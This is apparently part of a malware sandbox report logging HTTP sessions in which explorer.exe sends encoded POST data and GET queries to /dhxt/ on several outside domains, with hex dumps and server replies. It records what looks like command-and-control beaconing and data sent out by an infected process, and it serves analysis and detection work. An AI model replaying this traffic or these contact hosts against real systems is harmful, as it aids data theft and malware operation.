                                                                                                              Origin: http://www.b-yy.xyz
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.b-yy.xyz/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 55 6c 6b 41 48 6e 73 49 3d 76 73 58 6e 28 6d 71 75 28 4b 67 77 68 2d 39 47 63 2d 4f 66 32 44 4f 7a 75 6e 69 66 4b 4c 28 36 77 72 56 4e 59 71 65 43 63 44 6a 57 68 62 77 32 59 34 34 7a 47 36 63 41 67 7a 70 65 79 47 4e 47 67 58 5a 6f 78 66 67 32 34 53 64 70 68 4a 62 48 65 5a 38 34 53 4b 4e 74 63 36 69 6d 59 45 34 35 75 39 49 4a 7a 78 5a 4d 55 36 68 75 75 70 6f 48 4a 6f 68 59 75 66 4b 77 72 63 48 65 50 6b 64 6c 4c 4b 67 33 50 66 72 56 54 47 39 39 4b 77 78 76 36 34 5a 43 43 6a 36 56 4c 53 74 75 32 50 34 31 33 43 61 6b 68 37 57 69 77 43 38 6e 4f 57 6d 5f 4b 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: UlkAHnsI=vsXn(mqu(Kgwh-9Gc-Of2DOzunifKL(6wrVNYqeCcDjWhbw2Y44zG6cAgzpeyGNGgXZoxfg24SdphJbHeZ84SKNtc6imYE45u9IJzxZMU6huupoHJohYufKwrcHePkdlLKg3PfrVTG99Kwxv64ZCCj6VLStu2P413Cakh7WiwC8nOWm_Kw).
                                                                                                              Feb 6, 2023 14:38:31.336332083 CET130INHTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:38:31 GMT
                                                                                                              Content-Type: text/plain
                                                                                                              Content-Length: 0
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qYk%2ByyWI8%2BKBOqUKIWZ%2FzQBAOVrPstFcImlKZszXqXNBMDKI0VFKP8EYPGrukEZ62xuVd%2FkjRBhWx7QmlOUc0spHVZa9dyBk%2BbBUIYVupqKpJiApF%2BQtYBPnegiSgAM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 795449604d29371c-FRA
                                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              10192.168.2.449705132.148.233.23580C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:39:08.065886974 CET188OUTGET /dhxt/?UlkAHnsI=ifokxT4WC6kpOYMw3zM3kyJ4LmgGiGZS0703YorY1YsjQRfHkIwKIIkPfqFmPEtQEdhteK5+EAiLfL0gYcUW2DoEXWveCWJMNw==&2ani-=qhGAdkIKoH HTTP/1.1
                                                                                                              Host: www.staciesellslka.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:39:08.339430094 CET189INHTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:39:08 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.4.33
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://www.staciesellslka.com/wp-json/>; rel="https://api.w.org/"
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Vary: Accept-Encoding,User-Agent
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: 32 34 37 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 61 76 61 64 61 2d 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 77 69 64 65 20 61 76 61 64 61 2d 68 74 6d 6c 2d 68 65 61 64 65 72 2d 70 6f 73 69 74 69 6f 6e 2d 74 6f 70 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4c 61 6b 65 20 41 6e 6e 61 20 52 65 61 6c 20 45 73 74 61 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6b 65 73 74 72 65 6c 2e 69 64 78 68 6f 6d 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4c 61 6b 65 20 41 6e 6e 61 20 52 65 61 6c 20 45 73 74 61 74 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 74 61 63 69 65 73 65 6c 6c 73 6c 6b 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4c 61 6b 65 20 41 6e 6e 61 20 52 65 61 6c 20 45 73 74 61 74 65 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 74 61 63 69 65 73 65 6c 6c 73 6c 6b 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 09 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e
                                                                                                              Data Ascii: 247b<!DOCTYPE html><html class="avada-html-layout-wide avada-html-header-position-top" lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page not found &#8211; Lake Anna Real Estate</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//kestrel.idxhome.com' /><link rel="alternate" type="application/rss+xml" title="Lake Anna Real Estate &raquo; Feed" href="https://www.staciesellslka.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Lake Anna Real Estate &raquo; Comments Feed" href="https://www.staciesellslka.com/comments/feed/" /><link rel="shortcut icon
                                                                                                              Feb 6, 2023 14:39:08.339492083 CET190INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 74 61 63 69 65 73 65 6c 6c 73 6c 6b 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 32 2f 6c 6f 67 6f 2d 36 34 2e 6a 70 67 22 20 74 79 70 65
                                                                                                              Data Ascii: " href="http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-64.jpg" type="image/x-icon" />... Apple Touch Icon --><link rel="apple-touch-icon" sizes="180x180" href="http://www.staciesellslka.com/wp-content/uploads/2023/
                                                                                                              Feb 6, 2023 14:39:08.339524984 CET192INData Raw: 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 70 2d 7a 69 6c 6c 6f 77 2d 72 65 76 69 65 77 2d 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 63 73 73 2f 77 70 72 73 5f 75 6e 73 6c 69 64 65 72 2e 63 73 73 3f 76 65 72 3d 32 2e 37 27
                                                                                                              Data Ascii: m/wp-content/plugins/wp-zillow-review-slider/public/css/wprs_unslider.css?ver=2.7' type='text/css' media='all' /><link rel='stylesheet' id='unslider-dots-css' href='http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/publ
                                                                                                              Feb 6, 2023 14:39:08.339555979 CET193INData Raw: 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 36 2e 31 2e 31 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 09 09 09 09 3c 73 63 72 69 70
                                                                                                              Data Ascii: ator" content="WordPress 6.1.1" /><style type="text/css"></style><script>window.ihfKestrel = window.ihfKestrel || {};ihfKestrel.config = {"activationToken":"66bf4a5f-38b4-417a-9c02-0c6d35b5332b","platform":"wordpress"}
                                                                                                              Feb 6, 2023 14:39:08.339586973 CET194INData Raw: 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 74 74 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 74 61 63
                                                                                                              Data Ascii: " as="font" type="font/ttf" crossorigin><link rel="preload" href="https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/dg4n_p3sv6gCJkwzT6RXiJwo.woff2" as="font" type="font/woff2" crossorigin><link rel="preload" href="https://www.sta
                                                                                                              Feb 6, 2023 14:39:08.339618921 CET196INData Raw: 79 2d 73 6d 61 6c 6c 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 73 74 69 63 6b 79 3b 20 74 6f 70 3a 20 76 61 72 28 2d 2d 61 77 62 2d 73 74 69 63 6b 79 2d 6f 66 66 73 65 74 2c 30 29 3b 20 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d
                                                                                                              Data Ascii: y-small{ position: sticky; top: var(--awb-sticky-offset,0); }}@media screen and (min-width: 701px) and (max-width: 1177px){.fusion-no-medium-visibility{display:none !important;}body .md-text-align-center{text-align:center !important;}body .md-
                                                                                                              Feb 6, 2023 14:39:08.339648962 CET197INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 62 6f 64 79 20 2e 6c 67 2d 6d 78 2d 61 75 74 6f 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b
                                                                                                              Data Ascii: justify-content:flex-end !important;}body .lg-mx-auto{margin-left:auto !important;margin-right:auto !important;}body .lg-ml-auto{margin-left:auto !important;}body .lg-mr-auto{margin-right:auto !important;}body .fusion-absolute-position-large{p
                                                                                                              Feb 6, 2023 14:39:08.339675903 CET198INData Raw: 6e 2d 6d 61 69 6e 2d 6d 65 6e 75 2d 73 65 61 72 63 68 2d 6f 76 65 72 6c 61 79 20 66 75 73 69 6f 6e 2d 61 76 61 74 61 72 2d 63 69 72 63 6c 65 20 61 76 61 64 61 2d 64 72 6f 70 64 6f 77 6e 2d 73 74 79 6c 65 73 20 61 76 61 64 61 2d 62 6c 6f 67 2d 6c
                                                                                                              Data Ascii: n-main-menu-search-overlay fusion-avatar-circle avada-dropdown-styles avada-blog-layout-large avada-blog-archive-layout-grid avada-header-shadow-no avada-menu-icon-position-left avada-has-megamenu-shadow avada-has-mainmenu-dropdown-divider ava
                                                                                                              Feb 6, 2023 14:39:08.349338055 CET199INData Raw: 32 34 66 62 0d 0a 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 75 73 69 6f 6e 2d 68 65 61 64 65 72 2d 76 33 20 66 75 73 69 6f 6e 2d 6c 6f 67 6f 2d 61 6c 69 67 6e 6d 65 6e 74 20 66 75 73 69 6f 6e 2d 6c 6f 67 6f 2d 6c 65 66 74 20 66
                                                                                                              Data Ascii: 24fb"><div class="fusion-header-v3 fusion-logo-alignment fusion-logo-left fusion-sticky-menu- fusion-sticky-logo- fusion-mobile-logo-1 fusion-mobile-menu-design-modern"><div class="fusion-secondary-header"><div class="fusion-r
                                                                                                              Feb 6, 2023 14:39:08.349756002 CET200INData Raw: 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 75 73 69 6f 6e 2d 61 6c 69 67 6e 72 69 67 68 74 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 75 73 69 6f 6e 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2d 68 65 61 64 65
                                                                                                              Data Ascii: ><div class="fusion-alignright"><div class="fusion-social-links-header"><div class="fusion-social-networks boxed-icons"><div class="fusion-social-networks-wrapper"><a class="fusion-social-network-icon fusion-tooltip fusion-facebo
                                                                                                              Feb 6, 2023 14:39:08.506148100 CET202INData Raw: 72 72 65 72 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 22 3e 4c 69 6e 6b 65 64 49 6e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 09 09 09 3c 2f 64
                                                                                                              Data Ascii: rrer"><span class="screen-reader-text">LinkedIn</span></a></div></div></div></div></div></div><div class="fusion-header-sticky-height"></div><div class="fusion-header"><div class="fusion-row"><div class="fusion-logo" data-mar


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              11192.168.2.449706154.205.192.3780C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:39:14.383770943 CET253OUTPOST /dhxt/ HTTP/1.1
                                                                                                              Host: www.gmbuxie.net
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.gmbuxie.net
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.gmbuxie.net/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 55 6c 6b 41 48 6e 73 49 3d 53 6c 5a 66 38 75 47 65 46 67 46 64 74 52 34 50 64 30 47 4a 6d 72 54 56 4d 55 4b 70 7e 6c 31 64 35 58 56 33 36 36 53 39 78 48 4f 4f 33 6f 74 70 46 57 41 2d 4d 78 54 6f 28 5a 61 2d 64 64 79 63 69 57 4b 47 47 2d 4f 4d 72 4e 52 38 66 75 56 69 6e 78 41 73 6c 33 4e 52 35 61 5a 52 32 46 53 71 77 59 58 52 7e 4a 38 7a 43 33 50 4b 53 4b 45 37 7a 7a 74 6c 50 50 56 63 73 45 31 69 7e 74 6f 5f 50 62 7e 39 41 31 34 54 4d 4a 4a 53 4d 63 6b 33 41 58 6d 32 51 48 6e 53 33 38 65 41 48 51 30 4e 6d 44 75 7a 28 67 49 6e 4f 43 77 2d 69 6d 41 72 7e 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: UlkAHnsI=SlZf8uGeFgFdtR4Pd0GJmrTVMUKp~l1d5XV366S9xHOO3otpFWA-MxTo(Za-ddyciWKGG-OMrNR8fuVinxAsl3NR5aZR2FSqwYXR~J8zC3PKSKE7zztlPPVcsE1i~to_Pb~9A14TMJJSMck3AXm2QHnS38eAHQ0NmDuz(gInOCw-imAr~A).
                                                                                                              Feb 6, 2023 14:39:14.559606075 CET253INHTTP/1.1 200 OK
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 06 Feb 2023 13:39:14 GMT
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              12192.168.2.449707154.205.192.3780C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:39:17.079830885 CET254OUTGET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=fnx//ZKuIyFV+ywUcXCMreymOGqG1X949mc4/IKLw0PV+ItzLTg5d1T/xYzfA/mrlDLEGtysh8NCeOJ7jTcJkgo8rK5p5nSJ6g== HTTP/1.1
                                                                                                              Host: www.gmbuxie.net
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:39:17.246885061 CET254INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 06 Feb 2023 13:39:17 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              13192.168.2.449708217.76.156.25280C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:39:22.384221077 CET255OUTPOST /dhxt/ HTTP/1.1
                                                                                                              Host: www.lastmilerent.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.lastmilerent.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.lastmilerent.com/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 55 6c 6b 41 48 6e 73 49 3d 56 2d 55 78 61 52 7a 78 68 5f 50 45 28 65 28 63 31 58 43 50 79 64 58 4a 73 6c 31 65 67 53 6c 56 71 61 68 37 38 67 73 6d 33 7a 74 30 44 4f 76 42 59 72 58 51 4a 30 4e 32 6f 66 51 45 66 48 4d 45 73 66 67 54 70 67 4f 62 46 6e 6b 37 33 68 5a 48 51 6c 73 48 4f 51 6a 75 71 68 39 33 38 37 59 61 64 69 79 57 32 47 6f 48 4b 4e 56 79 78 53 38 59 31 38 75 67 5a 6f 73 47 31 77 79 49 6a 38 42 53 41 69 68 6c 50 47 56 61 28 62 55 64 41 33 34 4f 33 42 6d 36 54 73 64 6c 63 42 7a 5f 45 63 54 56 67 69 63 47 42 6d 56 35 59 5f 77 4f 32 2d 4c 66 68 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: UlkAHnsI=V-UxaRzxh_PE(e(c1XCPydXJsl1egSlVqah78gsm3zt0DOvBYrXQJ0N2ofQEfHMEsfgTpgObFnk73hZHQlsHOQjuqh9387YadiyW2GoHKNVyxS8Y18ugZosG1wyIj8BSAihlPGVa(bUdA34O3Bm6TsdlcBz_EcTVgicGBmV5Y_wO2-LfhQ).
                                                                                                              Feb 6, 2023 14:39:22.443350077 CET256INHTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:39:22 GMT
                                                                                                              Server: Apache
                                                                                                              X-ServerIndex: llim604
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: 31 61 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 61 73 74 6d 69 6c 65 72 65 6e 74 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 69 6d 67 73 2f 70 61 72 6b 69 6e 67 2f 69 63 6f 6e 2d 70 61 72 6b 69 6e 67 2e 70 6e 67 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 6c 61 73 74 6d 69 6c 65 72 65 6e 74 2e 63 6f 6d 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                                                                              Data Ascii: 1aa7<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.lastmilerent.com</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la p&aacute;gina de:</p> <h1>www.lastmilerent.com</h1> </div
                                                                                                              Feb 6, 2023 14:39:22.443392992 CET258INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 47 49 53 54 52 41 4e 54 45 2d 2d 3e 3c 21 2d 2d 54 45 52 4d 49 4e 41 5f 54 45 58 54 4f 5f 52 45 47 49 53 54 52 41 4e 54 45 2d 2d 3e 0d 0a 20 20 20 20
                                                                                                              Data Ascii: > ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL--> </div> <div class="back" style
                                                                                                              Feb 6, 2023 14:39:22.443420887 CET259INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 3e 53 69 20 71 75 69 65 72 65 73 20 6f 62 74 65 6e 65 72 20 6d 26 61 61 63 75 74 65 3b 73 20 69 6e 66 6f 72 6d 61 63 69 26 6f 61 63 75 74 65 3b 6e 20 70 61 72 61 20 63 72 65 61 72 20 74 75 20 70 72 6f 70 69
                                                                                                              Data Ascii: > <p>Si quieres obtener m&aacute;s informaci&oacute;n para crear tu propio proyecto online, consulta nuestros productos en la parte inferior.</p> </div></aside><section class="simple"> <span>Nuestros Productos</span>
                                                                                                              Feb 6, 2023 14:39:22.443449020 CET260INData Raw: 75 74 6d 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6c 69 6e 6b 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 77 65 62 22 3e 3c 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: utm_source=parking&amp;utm_medium=link&amp;utm_campaign=web"><article> <img src="https://piensasolutions.com/imgs/parking/icon-web.png"> <h2>MI P&Aacute;GINA WEB</h2> <p>Dise&ntilde;a tu propi
